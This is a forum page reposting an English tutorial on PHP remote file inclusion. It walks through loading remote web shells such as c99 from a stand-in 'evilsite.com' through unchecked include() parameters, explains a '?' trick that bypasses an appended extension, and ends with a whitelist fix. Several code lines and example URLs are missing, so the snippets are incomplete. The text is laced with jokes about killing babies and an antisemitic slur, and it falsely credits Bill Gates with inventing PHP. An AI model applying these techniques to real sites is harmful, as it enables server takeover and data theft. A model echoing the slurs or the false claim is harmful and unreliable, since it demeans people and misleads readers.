RFI Tutorial อังกิดคัฟ

มีนาคม 24, 2019, 05:02:52 AM *
ข่าว: TrueMoneyแลกเงินสด ทรูมันนี่แลกเงินสด ขายบัตรทรูมันนีวันนี้ 25 ธันวาคม 2561

เกมส์มัน ยินดีต้อนรับ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ สมัครสมาชิกด้วย SMS

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น
      โปรโมชั่น    ของขวัญ   โฆษณาราคาถูก   ของขวัญวันเกิด   
      โฆษณาป้ายละ 500    ป้ายโฆษณา   โฆษณาราคาถูก   Ads ป้ายละ 500   ติดโฆษณา
ติดต่อ Webmaster : 0829755777 Email : decha (@) me.com
ติดต่อโฆษณา ตำแหน่งใดก็ได้ ที่หน้าเวป, ปักหมุดกระทู้
หน้า: [1]
  ส่งหัวข้อนี้  |  พิมพ์  
ผู้เขียน หัวข้อ: RFI Tutorial อังกิดคัฟ  (อ่าน 1598 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้

« เมื่อ: เมษายน 27, 2010, 12:00:35 PM »

Basically, the include function in PHP allows contents from local or remote files to be pretty much "copied and pasted" and executed in a script at runtime.

Now suppose yo' dad wants a small website. All he wants is three pages.
A blog page where he can update you on how many babies he has killed.
A contact page with his email on it os people can ask advice on the best way to kill babies.
An gallery page where he can show you pictures of all the babies he has killed.

He creates four pages. blog.php, contact.php and gallery.php along with index.php, this is our "main" page that will contain a header, a side bar for navigation, some php and a footer.

You would view the pages on his website like this.


Let's take a look at the code for index.php

//html for header
//html for menu
$page = $_GET['page'];
//html for footer

On line 2, $page is set to $_GET['page']

This means when we go to


$page is set to blog.php.
On line 3 it is "included". The contents from blog.php is copied and pasted into index.php

What's wrong with this? Well as I said earlier the include function can also include remote files. Files NOT on his web server.

Say we change "blog.php" to "http://www.google.com"


You would see the google home page instead of your dads shitty blog.

What's the point of this?

We can include "bad" or "evil" scripts. Some of you may heard of "shells" (r57,c99,g00nshell,peanut). Shells are scripts with functions like letting you view directories of the server it's executed on, deleting files, viewing files, letting you run system commands and more.

Here's how we would use it:


* We have to use the shell as .txt so it's plaintext. If we used .php then the script would be executed on http://www.evilsite.com.

Let's look at another example of a RFI.

Undefined variables.

Say yo' dad has learned how to use MySQL and to put content on his blog page he uses a form he created to connect to his MySQL server and insert his stories into a table.

To connect to the MySQL server & add content he needs a username & a password. He stores these in a file called "db_details.php".

The blog.php file needs these credentials to connect and get the content.

so in index.php:

//html for header
//html for menu
$database_config_file = "db_details.php";
$page = $_GET['page'];
//html for footer

and in blog.php:

//code to connect to MySQL and get the latest blog posts

Since we are calling blog.php through index.php like this:


in index.php $database_config_file is set to "db_details.php" and in blog.php it is included. There is no problem there, it then can connect to the MySQL server with the credentials and retrieve his blog content.

But, if we went to blog.php directly:


then $database_config_file is not set to anything. It still includes it but it is including nothing. Since we did not use index.php to access it, we did not get: $database_config_file = "db_details.php";

This is a problem, since we can set it ourselves.
If we go to


$database_config_file will be set to http://www.evilsite.com/c99.txt

Again, blog.php does not check if what it is including is valid.


As the famous inventor of PHP, Bill Gates says: There is more than one way to do it.

There are a few ways to prevent these vulnerabilities.

Yo' dad thinks he has gotten smart and has put in a method to stop little leet haxors like you.
This one is easily bypassed.

$page = $_GET['page'];
include($page . ".php");

This means when we go to index.php?page=home it will actually include home.php.

Omg, dat meanz it wont include my .txt, it will try to include .txt.php Sad.

Not necessarily. If we put a question mark after the ".txt" then anything that index.php puts after $page will go to the remote script we are including.

Like this:


Index.php would try and include :


To prevent the problem with variables not being defined. Just make sure you define every variable that gets used.

There are a few other ways to prevent these vulnerabilities involving cleaning the input, checking if files exist etc but since I'm only typing with my big jew nose right now I can't be bothered going through them so I'm going to just do the most practical;


$page = $_GET['page'];
case "blog":
case "contact":
case "gallery":
default: //A page wasn't chosen, or one that wasn't "home" or "gallery"
echo "Choose a page from our fine selection!1!!";





ตุ๊กตาเขี้ยวกุด | นาฬิกาปลุกเขียนโน๊ต | แรงบันดาลใจ | ของเล่นแปลกๆ

Follow Decha Chanwirun Liang's board GadGetMaShow.com on Pinterest.
หน้า: [1]
  ส่งหัวข้อนี้  |  พิมพ์  

Sitemap Decha Chanwirun เกมส์ออนไลน์ Game PC  
Thank SMF Security Check DMCA.com Protection Status

Google เข้าเยี่ยมชมหน้านี้ล่าสุดเมื่อ : มกราคม 02, 2019, 07:54:08 PM